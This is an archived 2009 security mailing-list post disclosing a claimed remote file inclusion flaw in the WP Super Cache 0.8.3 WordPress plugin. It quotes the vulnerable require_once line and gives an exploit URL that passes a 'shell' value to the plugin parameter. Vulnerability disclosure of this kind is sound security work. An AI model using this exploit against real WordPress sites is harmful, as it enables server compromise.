[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

wordpress plugins WP Super Cache v0.8.3 Remote File Inclusion Vulnerability

To: submit@xxxxxxxxxxx, staff@xxxxxxxxxxxxxxxxxxxxxxx, submissions@xxxxxxxxxxxxxxxxxxxxxxx, vuldb <vuldb@xxxxxxxxxxxxxxxxx>, vuln <vuln@xxxxxxxxxxx>, bugtraq@xxxxxxxxxxxxxxxxx
Subject: wordpress plugins WP Super Cache v0.8.3 Remote File Inclusion Vulnerability
From: "Cru3l.b0y" <cru3l.b0y@xxxxxxxxx>
Date: Thu, 23 Jul 2009 08:15:49 +0430

Hi Dear,
I found a new bug. please publish it.
thank you
best regards

===========================================================================================


  [o] wordpress plugins WP Super Cache v0.8.3 Remote File Inclusion 
Vulnerability

       Software     :  WP Super Cache v0.8.3
       Vendor       :  http://wordpress.org/
       Download     :  
http://downloads.wordpress.org/plugin/wp-super-cache.0.8.3.zip
       Author       :  Cru3l.b0y
       Home         :  WwW.DeltaHacking.Net
       Description  :  A very fast caching engine for WordPress that produces 
static html files.
===========================================================================================

  [o] Vulnerable file

         wp-cache-phase1.php

                require_once( $plugin );
        
        
  [o] Exploit

            http://localhost/[path]/wp-cache-phase1.php?plugin=shell

Follow-Ups:
- Re: wordpress plugins WP Super Cache v0.8.3 Remote File Inclusion Vulnerability
  - From: g30rg3_x

Prev by Date: [GSEC-TZO-45-2009] iPhone remote code execution
Next by Date: Ocean CMS 0.0.2 Remote File Inclusion Vulnerability
Previous by thread: [GSEC-TZO-45-2009] iPhone remote code execution
Next by thread: Re: wordpress plugins WP Super Cache v0.8.3 Remote File Inclusion Vulnerability
Index(es):
- Date
- Thread